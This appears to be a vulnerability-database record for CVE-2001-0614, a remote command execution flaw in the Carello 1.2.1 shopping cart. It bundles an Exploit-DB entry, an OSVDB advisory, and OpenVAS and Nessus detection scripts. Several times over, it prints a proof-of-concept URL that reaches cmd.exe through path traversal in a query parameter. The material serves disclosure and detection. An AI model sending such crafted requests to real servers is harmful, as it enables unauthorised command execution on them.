ID EDB-ID:20850 Type exploitdb Reporter Peter Gründl Modified 2001-05-14T00:00:00
Description
Pacific Software Carello 1.2.1 Shopping Cart Command Execution Vulnerability. CVE-2001-0614 . Remote exploit for windows platform
source: http://www.securityfocus.com/bid/2729/info
It is possible for a remote user to execute arbitrary commands on a host using Carello Shopping Cart software. A specially crafted HTTP request could cause inetinfo.exe to consume all available system resources, refusing any new connections. If arbitrary code is part of the HTTP request, it will be executed with the privileges of the web server.
http://foo.org/scripts/Carello/Carello.dllCARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe20/c20echo20test>c:\defcom.txt
{"id": "EDB-ID:20850", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Pacific Software Carello 1.2.1 Shopping Cart Command Execution Vulnerability", "description": "Pacific Software Carello 1.2.1 Shopping Cart Command Execution Vulnerability. CVE-2001-0614 . Remote exploit for windows platform", "published": "2001-05-14T00:00:00", "modified": "2001-05-14T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/20850/", "reporter": "Peter Gr\u00c3\u00bcndl", "references": [], "cvelist": ["CVE-2001-0614"], "lastseen": "2016-02-02T15:08:29", "viewCount": 5, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2016-02-02T15:08:29", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2001-0614"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231011776", "OPENVAS:11776"]}, {"type": "nessus", "idList": ["CARELLO.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:6591"]}], "modified": "2016-02-02T15:08:29", "rev": 2}, "vulnersScore": 7.1}, "sourceHref": "https://www.exploit-db.com/download/20850/", "sourceData": "source: http://www.securityfocus.com/bid/2729/info\r\n\r\nIt is possible for a remote user to execute arbitrary commands on a host using Carello Shopping Cart software. A specially crafted HTTP request could cause inetinfo.exe to consume all available system resources, refusing any new connections. If arbitrary code is part of the HTTP request, it will be executed with the privileges of the web server.\r\n\r\nhttp://foo.org/scripts/Carello/Carello.dllCARELLOCODE=SITE2&VBEXE=C:\\..\\winnt\\system32\\cmd.exe20/c20echo20test>c:\\defcom.txt ", "osvdbidlist": ["6591"]}
{"cve": [{"lastseen": "2020-12-09T19:19:25", "description": "Carello E-Commerce 1.2.1 and earlier allows a remote attacker to gain additional privileges and execute arbitrary commands via a specially constructed URL.", "edition": 5, "cvss3": {}, "published": "2001-08-22T04:00:00", "title": "CVE-2001-0614", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2001-0614"], "modified": "2017-12-19T02:29:00", "cpe": ["cpe:/a:carello:e-commerce:1.2.1"], "id": "CVE-2001-0614", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0614", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:carello:e-commerce:1.2.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:01", "bulletinFamily": "software", "cvelist": ["CVE-2001-0614"], "edition": 1, "description": "## Vulnerability Description\nCarello contains a flaw that may allow a malicious user to execute arbitrary code or cause a denial of service. The issue is triggered when a specially crafted HTTP request is sent to the Carello.dll library. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nCarello contains a flaw that may allow a malicious user to execute arbitrary code or cause a denial of service. The issue is triggered when a specially crafted HTTP request is sent to the Carello.dll library. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.\n## Manual Testing Notes\nhttp://[victim]/scripts/Carello/Carello.dllCARELLOCODE=SITE2&VBEXE=C:\\..\\winnt\\system32\\cmd.exe20/c20echo20test>c:\\defcom.txt\n\n## References:\nVendor URL: http://www.carelloweb.com/\n[Nessus Plugin ID:11776](https://vulners.com/search?query=pluginID:11776)\nMail List Post: http://www.securityfocus.com/advisories/3311\nKeyword: def-2001-25\nISS X-Force ID: 6532\n[CVE-2001-0614](https://vulners.com/cve/CVE-2001-0614)\nBugtraq ID: 2729\n", "modified": "2001-05-14T00:00:00", "published": "2001-05-14T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6591", "id": "OSVDB:6591", "type": "osvdb", "title": "Carello E-Commerce Carello.dll Command Execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-05-08T08:39:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0614"], "description": "Carello.dll was found on the remote web server.", "modified": "2020-05-05T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231011776", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011776", "type": "openvas", "title": "Carello detection", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Carello detection\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n#\n# Copyright:\n# Copyright (C) 2003 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11776\");\n script_version(\"2020-05-05T09:44:01+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(2729);\n script_cve_id(\"CVE-2001-0614\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Carello detection\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2003 Michel Arboi\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"Host/runs_windows\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the latest version if necessary.\");\n\n script_tag(name:\"summary\", value:\"Carello.dll was found on the remote web server.\");\n\n script_tag(name:\"insight\", value:\"Versions up to 1.3 of this web shopping cart allowed\n anybody to run arbitrary commands on your server.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\n\nres = http_is_cgi_installed_ka( item:\"Carello.dll\", port:port );\nif( res ) {\n security_message( port:port );\n}\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-08T11:44:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0614"], "description": "Carello.dll was found on your web server. \nVersions up to 1.3 of this web shopping cart allowed anybody\nto run arbitrary commands on your server.\n\n*** Note that no attack was performed, and the version number was\n*** not checked, so this might be a false alert", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:11776", "href": "http://plugins.openvas.org/nasl.php?oid=11776", "type": "openvas", "title": "Carello detection", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: carello.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: Carello detection\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n#\n# Copyright:\n# Copyright (C) 2003 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"Carello.dll was found on your web server. \nVersions up to 1.3 of this web shopping cart allowed anybody\nto run arbitrary commands on your server.\n\n*** Note that no attack was performed, and the version number was\n*** not checked, so this might be a false alert\";\n\ntag_solution = \"Upgrade to the latest version if necessary\";\n\n# References:\n#\n# Date: Wed, 02 Oct 2002 17:10:21 +0100\n# From: \"Matt Moore\" <matt@westpoint.ltd.uk>\n# To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org\n# Subject: wp-02-0012: Carello 1.3 Remote File Execution (Updated 1/10/2002)\n#\n# http://www.westpoint.ltd.uk/advisories/wp-02-0012.txt\n\nif(description)\n{\n script_id(11776);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(2729);\n script_cve_id(\"CVE-2001-0614\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n name = \"Carello detection\";\n\n script_name(name);\n \n\n \n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(\"This script is Copyright (C) 2003 Michel Arboi\");\n family = \"Web application abuses\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# Please note that it is possible to test this vulnerability, but\n# I suspect that Carello is not widely used, and I am lazy :-)\n# \ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"global_settings.inc\");\n\nport = get_http_port(default:80);\n\nres = is_cgi_installed_ka(item:\"Carello.dll\", port:port);\nif (res) security_message(port);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T01:22:02", "description": "The remote host appears to be running Carello.dll, a web-based\nshopping cart.\n\nVersions up to 1.3 of this web shopping cart have a command execution\nvulnerability. This could allow a remote attacker to run arbitrary\ncommands on the system with the privileges of the web server.\n\n*** Note that no attack was performed, and the version number was ***\nnot checked, so this might be a false alert", "edition": 23, "published": "2003-06-26T00:00:00", "title": "Carello E-Commerce Carello.dll Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0614"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "CARELLO.NASL", "href": "https://www.tenable.com/plugins/nessus/11776", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11776);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/11/15 20:50:16\");\n\n script_cve_id(\"CVE-2001-0614\");\n script_bugtraq_id(2729);\n\n script_name(english:\"Carello E-Commerce Carello.dll Command Execution\");\n script_summary(english:\"Checks for the presence of carello.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote web application has a command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running Carello.dll, a web-based\nshopping cart.\n\nVersions up to 1.3 of this web shopping cart have a command execution\nvulnerability. This could allow a remote attacker to run arbitrary\ncommands on the system with the privileges of the web server.\n\n*** Note that no attack was performed, and the version number was ***\nnot checked, so this might be a false alert\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.westpoint.ltd.uk/advisories/wp-02-0012.txt\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to the latest version of the software.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/06/26\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"http_version.nasl\", \"find_service1.nasl\", \"no404.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n#\n# Please note that it is possible to test this vulnerability, but\n# I suspect that Carello is not widely used, and I am lazy :-)\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80);\nres = is_cgi_installed3(item:\"Carello.dll\", port:port);\nif (res) security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
